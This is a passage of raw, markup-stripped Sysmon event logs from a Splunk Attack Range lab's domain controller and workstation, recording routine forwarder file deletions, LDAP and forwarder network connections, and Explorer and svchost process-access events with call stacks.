Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD1FA5F59073EAF9DDB20E0205ECF84D,SHA256=0FC360AA616CBDB8F1BC9412BF6618366391E8350E242A5A78E468330965DAED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:04.600{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61961-false10.0.1.12-8000- 23542300x80000000000000001054430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:12.404{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E408E1462C4D331FFB876E2014E5770A,SHA256=527EC6CD1CC500E7D7694B45A4E732C72DF35143A3B837095E3908588B2B58DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810247Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:11.346{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57455-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810246Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:12.104{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D77CF626D38A2D7C4C30FE630DB2BEB8,SHA256=1715373EDE91C5C4D27CA40BADFCD04D7CABFC6293A188D49E12D959E00964FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:13.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC7EFD1E7F8257C40BA99B30CBF21D33,SHA256=FCA429294A50D9EFE893AB182452A06C47A81904FF4209F724DCF98E1F5FCE6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810248Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:13.119{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7939B2BEE1BF94DA56433514683EF78,SHA256=545023F9DD864750928DA3BD1A5EE90061C6C116D5DD10083C96DF6F491093D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:13.187{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:13.187{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:14.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DFF1B9B067A7BCC16D46AA2A0D1148E,SHA256=C2EC5A7438096A0C9E858CE9AF15D2604F822C5BC4861FEF4AE3D62945178F5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810249Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:14.150{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33A62C88DE87F7640AB6DE5A7A94A5F7,SHA256=56D9F0E42A9215238BB1EEFDB3F8F2B65315740747695671D7BA218A28DAD824,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:15.572{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA2F719C540CE801A725BB0A65736173,SHA256=4668C5A00B04B41AF6E52CAB0A14B3224E6F021C1AC5A4C0EA54B4031A9C4764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:15.572{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30D2E6035CAD857621204B0CD834135B,SHA256=DB5BD2817816EDC8F9581206BE7A803798CB35FE8700A228DE97A1F055D3AF6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:15.440{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D225F78390EA9D2D13ED48232CA54A5A,SHA256=F08F9C661659844E3F51D30BE22378FD5AC85BD7097F370154D3782C6CBAE925,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810250Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:15.193{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C298395BA7CDC785C3C5A3E068B2513,SHA256=F26A984CEF6E70061C3963C922E8F8DE5B213E11AC203D6D94200ECCE5844521,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:15.303{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:15.303{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001054443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:08.084{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61962-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001054442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:08.084{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61962-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001054441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:16.456{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A51B3497AE71743CB2B5308A12411ABC,SHA256=725389A485099FF248601D2922664F2F3E12C3382AD5D45A79D99AF5310D9441,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810251Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:16.240{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=424D3C86E468741CEB889F6189EEC737,SHA256=1F2B1ABFD032E947783558E60BD149C184639164FD960A4891AE25A303F5EB49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:17.486{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=725F316CED708DB6D3FF073F46503F03,SHA256=1460145BD99FF26F1763BDDBC4D37A9B202599F194B293F7410A3EB4D1931F66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810252Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:17.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A263EC12AC7F92A7E09D691C1F0BAC8,SHA256=EBD4DDD7D1F1319C4C3CF50B05C78F3935459912B091E8DEA372A60834E91A41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:18.516{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:18.500{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=414F95CFE1189F773183353876A0FDE4,SHA256=53EF9A6E5BF5396A265FE4C07A04EB57FDC911F5C35DC7F7E2E20B8C954DDFD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810253Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:18.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7818344D5B8D8EDBE368C733DC6777CB,SHA256=FDE6E46D511679A1146FA58247432BB5C30F61F2DA60AA6A53C53AC3B0EDA5D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.644{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61963-false10.0.1.12-8000- 23542300x80000000000000001054448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:19.501{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B0BC57D5FEDB541FA285ED3DBF6B923,SHA256=D05C72745299FB1B3547CD6267952F6C07577BA3FB3C2430C9204C0915525FE0,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810255Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:19.303{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED34FC2E7B55514A5243E7DFBCF07DA3,SHA256=20BCEF62DC8B4431EE467EDF69071E3E361ACACD79523B946E745B78323BC005,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810254Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:17.374{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57456-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:20.515{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D47E1AC2A1A920BC20C1CC683BC6A3E8,SHA256=5D1D5A5B8EC6CBDD865E82B6EC108884754F819E04AFECEDB02AE8489CC10DF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810257Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:20.850{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810256Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:20.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B82B44C673050AAB65BA9B206079208,SHA256=6E4AF4C1BAEE203B4626BA03C383666A56E41C07E46316021D28DCC155F48576,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:21.668{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:21.668{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:21.515{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34FF42A4754A45E10E94E82E636F394F,SHA256=6027F246E3F16492F9921F3E7B3930281BB22F2D54735049845B43E269CB32F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810258Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:21.350{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CADC76A9861EDC40AD370655681EB5,SHA256=F54DCA2D26559E07EA4845C9A6DA833A6A293C6BD56A7705B611915AE6057A49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.769{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F02298B5C54EB669ADC6015229F3FE69,SHA256=959CA83D59EC264C214E20C276AE8D09079176C3CFC7629A5991588247ED5539,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
